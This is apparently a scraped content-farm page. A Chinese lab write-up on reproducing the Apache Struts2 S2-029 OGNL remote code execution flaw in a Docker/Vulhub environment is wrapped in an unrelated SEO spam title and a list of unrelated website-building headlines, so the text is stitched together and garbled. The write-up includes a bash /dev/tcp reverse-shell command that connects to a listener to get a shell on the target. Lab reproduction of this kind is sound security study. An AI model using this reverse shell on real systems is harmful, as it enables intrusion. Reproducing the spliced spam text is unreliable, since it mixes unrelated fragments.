当前位置: 首页 > news >正文

杭州网站前端建设广州最穷的三个区

news 2025/12/26 14:40:26
杭州网站前端建设,广州最穷的三个区,建俄语网站,三艺网站建设来浅浅的讲一下Struts2漏洞 目录 1.Docker_Vulnhub搭建 2.Struts2 3.Struts2的框架特征 4.S2-029--Remote Code Execution 5.漏洞复现 1.RCE 2.Getshell 1.Docker_Vulnhub搭建 因为我用的是Linux#xff0c;所以我选择直接搭个docker#xff0c;这里我建议先换个…来浅浅的讲一下Struts2漏洞 目录 1.Docker_Vulnhub搭建 2.Struts2 3.Struts2的框架特征 4.S2-029--Remote Code Execution 5.漏洞复现 1.RCE 2.Getshell 1.Docker_Vulnhub搭建 因为我用的是Linux所以我选择直接搭个docker这里我建议先换个源 vim /etc/apt/sources.list 我用的清华源 deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free换完之后记得更新一下 sudo apt update 然后就可以装我们的docker啦 sudo apt install docker.io 然后就是安装docker-compose sudo apt-get install docker-compose 下载vulnhub git clone https://github.com/vulhub/vulhub.git //如果上面这个太慢的话,可以试试下面这个wget https://github.com/vulhub/vulhub/archive/master.zip -O vulhub-master.zipunzip vulhub-master.zip 然后就是开启docker环境 sudo systemctl start docker然后可以去查看一下 然后今天我们要复现的 s2-029在vulnhub里面没有所以需要我们自己去拉取 docker pull medicean/vulapps:s_struts2_s2-029 然后去启动漏洞环境 docker run -d -p 8081:8080 medicean/vulapps:s_struts2_s2-029 然后你就会发现网卡信息那里多了一栏 然后我们用本机的环境去访问 kali的ip:8080/default.action 访问成功环境搭建成功 2.Struts2 Struts2是apache项目下的一个web 框架普遍应用于阿里巴巴、京东等互联 网、政府、企业门户网站。用的java语言开发  漏洞介绍 Struts2漏洞是一个经典的漏洞系列根源在于Struts2 引入了OGNL表达式使得框架 具有灵活的动态性 。随着整体框架的补丁完善现在想挖掘新的Struts2漏洞会比以前 困难很多从实际了解的情况来看大部分用户早就修复了历史的高危漏洞。目前在 做渗透测试时Struts2漏洞主要也是碰碰运气或者是打到内网之后用来攻击没打补 丁的系统会比较有效。 3.Struts2的框架特征 Struts2 框架特征 查看被测应用系统的源码 URL 接口地址以 “ .action ” “ .do ” 结尾或地址中包含 “ ! ” 符号或者在被测应用的服务器上查看 应用所在目录/WEB-INF/lib/下的jar文件若存在struts2-core- 2.*.**.jar或xwork-core-2.*.**.jar格式的jar文件 则需检测是否 存在Struts2 远程代码执行漏洞。 4.S2-029--Remote Code Execution rce的原理 Struts2的动态性在于ongl表达式可以获取到运行变量的值并且有机会执行函数调用 。如果可以把恶意的请求参数送到ognl的执行流程中就会导致任意代码执行漏洞。 5.漏洞复现 1.RCE 这里我就直接用漏扫了  于是就对应的去利用 看见是能成功rce的 2.Getshell 能不能getshell呢废话都能rce了肯定能getshell啊 先去开一下netcat 然后就是反向连接弹shell了 /bin/bash -c bash -i /dev/tcp/192.168.246.1/9191 01 这样就是成功的getshell了 当然了这个有没有手工的poc呢 肯定是有不过很长  最后养成好习惯关闭docker环境 docker-compose down //如果是上面的环境的话就要走以下命令 sudo systemctl stop docker sudo systemctl stop docker.socket sudo systemctl status docker //最后查看一下环境是否关闭
http://www.pierceye.com/news/582155/

相关文章:

  • 有没有专门做翻译的网站安徽建设工程信息网招标公告
  • 保险咨询网站留电话中国十大网络公司排行榜
  • 领手工在家做的网站2019网页设计与实现论文
  • 兰州微信信息平台网站建设绍兴本地网站建设
  • 关于旅游网站策划书千锋前端培训多少钱
  • 温州网站建设结构做代练网站能备案
  • 零基础学习做网站第三方装修评估公司
  • 基础微网站开发动态网站彩票投注员做啥的
  • 西安做网站设计公司爱做网站免费版
  • 效果图网站接单重庆一般建一个网站需要多少钱
  • 网站建设征求意见稿辅料企业网站建设费用
  • 上海网站建设公司服务沅江网站制作
  • 公司网站开发费用计入什么科目虚拟主机怎么建网站
  • 天津网站建设技术网页设计与制作教程版徐洪亮课后答案
  • 旅游网站建设方案简介用asp做的网站打开页面很慢
  • 做影视网站 片源从哪里来做自媒体的上那些网站
  • 邢台网站开发百度云 做网站
  • 淘宝优惠劵网站建设wordpress主题 简洁
  • 自己做电影资源网站揭阳新闻最新消息
  • 北碚免费建站哪家做得好佛山网站建设设计
  • 怎么做网站拍卖的那种wordpress主题搜索图标
  • 三亚网站建设平台查数据的权威网站
  • html网站制作答辩ppt网站备份和备案的区别
  • 网站开发需要工具免费的ps软件
  • 常州网站建设优质商家重庆互联网怎么样
  • 做网站发广告动漫网页设计报告
  • 求职招聘网站建设投标书沈阳网站建设的公司哪家好
  • 做导航网站有发展吗南京企业网站制作哪家好
  • 千万pv网站开发成本招聘网站数建设
  • 吐鲁番大型网站建设平台找客户去哪个平台